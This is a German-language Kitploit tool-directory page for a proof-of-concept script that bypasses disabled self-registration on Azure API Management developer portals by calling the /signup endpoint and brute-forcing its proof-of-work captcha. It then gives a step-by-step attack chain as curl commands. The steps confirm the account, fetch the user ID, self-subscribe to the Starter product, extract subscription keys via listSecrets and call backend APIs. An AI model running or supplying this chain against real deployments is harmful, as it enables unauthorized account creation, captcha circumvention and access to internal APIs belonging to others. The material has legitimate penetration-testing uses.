Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Azure-APIM-Dev-Portal-Signup-Bypass — Python-Skript zum Umgehen der Azure-APIM-Registrierung, wenn die Benutzeroberfläche deaktiviert ist. Dies unterscheidet sich von CVE-2025-66390, da nichts mandantenübergreifend eingerichtet werden muss. | Kitploit
Tools/GitHubGitHub/dz-y/azure-apim-dev-portal-signup-bypass
Authentifizierung & AutorisierungCloud-Infrastruktur-SicherheitWebanwendungs-ExploitationAPI-SicherheitstestsPenetrationstestsCloud-SicherheitFehlkonfigurationAPI-SicherheitCAPTCHA-Umgehung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubdz-y/azure-apim-dev-portal-signup-bypass

Azure-APIM-Dev-Portal-Signup-Bypass

Python-Skript zum Umgehen der Azure-APIM-Registrierung, wenn die Benutzeroberfläche deaktiviert ist. Dies unterscheidet sich von CVE-2025-66390, da nichts mandantenübergreifend eingerichtet werden muss.

Repository anzeigen
11vor 1 MonatNoch nicht geprüft

Ein Proof-of-Concept-Skript zur Umgehung einer deaktivierten Selbstregistrierung im Entwicklerportal von Azure APIM (APIM), indem direkt die Backend-Registrierungs-API aufgerufen wird.

Was es tut

Entwicklerportale von Azure APIM können so konfiguriert werden, dass die Selbstregistrierung über die Portal-Oberfläche deaktiviert ist. In einigen Bereitstellungen bleibt der zugrunde liegende API-Endpunkt (/signup) aktiv und erreichbar, auch wenn der UI-Button ausgeblendet oder entfernt wurde. Dieses Skript nutzt diese Lücke aus, indem es:

  1. Die Proof-of-Work-Captcha-Herausforderung (PoW) von /v2/captcha-challenge abruft
  2. Die SHA-256-PoW-Lösung clientseitig per Brute-Force ermittelt
  3. Eine Registrierungsanfrage direkt an /signup mit der gelösten Herausforderung und den Kontodetails sendet

Alle Eingaben (Ziel-URL, Anmeldedaten, Proxy) werden zur Laufzeit interaktiv abgefragt.

Bezug zu CVE-2025-66390

CVE-2025-66390 (CVSS 9.8 Kritisch) beschreibt einen mandantenübergreifenden APIM-Registrierungs-Bypass: Ein Angreifer missbraucht einen Mandanten, in dem die Registrierung aktiviert ist, um Konten in einem anderen Mandanten zu registrieren, in dem die Registrierung deaktiviert ist, indem der Host-Header in API-Anfragen manipuliert wird. Microsoft stufte dies eher als Konfigurationsproblem denn als Produktschwachstelle ein.

Dies erfordert keinen Cross-Tenant; stattdessen wird lediglich der Endpunkt /v2/captcha-challenge verwendet, um das Captcha in durchschnittlich 75.000 Iterationen zu lösen.

Verwendung

root@kitploit:~
python3 apim_signup.py

Fragt nach Ziel-URL, Kontodetails, Passwort (versteckte Eingabe, wird zur Bestätigung angezeigt) und optionalem Proxy.

Ausnutzungskette nach der Registrierung

Sobald die Registrierungsanfrage erfolgreich ist und die Bestätigungs-E-Mail eintrifft, sieht die vollständige Angriffskette wie folgt aus:

Schritt 1 — E-Mail bestätigen

Klicken Sie auf den Bestätigungslink in der Registrierungs-E-Mail. Dadurch wird das Konto aktiviert, bevor die Verwaltungs-API es authentifiziert.

Schritt 2 — Authentifizieren und Benutzer-ID abrufen

Rufen Sie die APIM-Verwaltungs-API mit Basic Auth (base64(email:password)) auf, um Ihre interne Benutzer-ID zu erhalten:

root@kitploit:~
curl -s "https://<service>.management.azure-api.net/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.ApiManagement/service/<service>/identity?api-version=2019-12-01" \
  -H "Authorization: Basic <base64(email:password)>"
# → {"id":"<user-id>"}

Das zurückgegebene id-Feld wird in allen nachfolgenden Verwaltungs-API-Aufrufen verwendet.

ODER rufen Sie /developer/identity?api-version=2022-04-01-preview auf <-- Version spielt keine Rolle Eine UI fordert zur Anmeldung auf; von dort erhalten Sie ebenfalls Ihre ID.

Bild

Schritt 3 — Produkt selbst abonnieren

Das standardmäßige Produkt Starter wird mit approvalRequired: false ausgeliefert, d. h. es ist keine Administratorfreigabe erforderlich. Selbst-Abo per PUT:

root@kitploit:~
curl -s -X PUT "https://<service>.management.azure-api.net/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.ApiManagement/service/<service>/users/<user-id>/subscriptions/starter-sub?api-version=2019-12-01" \
  -H "Authorization: Basic <base64(email:password)>" \
  -H "Content-Type: application/json" \
  -d '{"properties":{"scope":"/products/starter","displayName":"Starter"}}'
# → HTTP 201 Created

Eine Bestätigungs-E-Mail ("Your subscription to the Starter") trifft von [email protected] ein.

Schritt 4 — Abonnementschlüssel abrufen

root@kitploit:~
curl -s -X POST "https://<service>.management.azure-api.net/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.ApiManagement/service/<service>/users/<user-id>/subscriptions/starter-sub/listSecrets?api-version=2019-12-01" \
  -H "Authorization: Basic <base64(email:password)>"
# → {"primaryKey":"...","secondaryKey":"..."}

Schritt 5 — Backend-APIs aufrufen

Verwenden Sie den Primärschlüssel als Ocp-Apim-Subscription-Key gegenüber dem APIM-Gateway, um authentifizierte Backend-Aufrufe durchzuführen:

root@kitploit:~
curl -s "https://<service>.azure-api.net/<api-path>" \
  -H "Ocp-Apim-Subscription-Key: <primaryKey>"

Der Zugriff wird dadurch bestimmt, welche APIs dem Produkt Starter zugeordnet sind — in einer fehlkonfigurierten Bereitstellung können dadurch interne Backends ohne weitere Authentifizierung zugänglich sein.


Weitere Details finden Sie in diesem Artikel, der die Kette sehr gut beschreibt – lassen Sie lediglich den Cross-Tenant-Teil weg. https://www.praetorian.com/blog/azure-apim-signup-bypass/

Tool herunterladen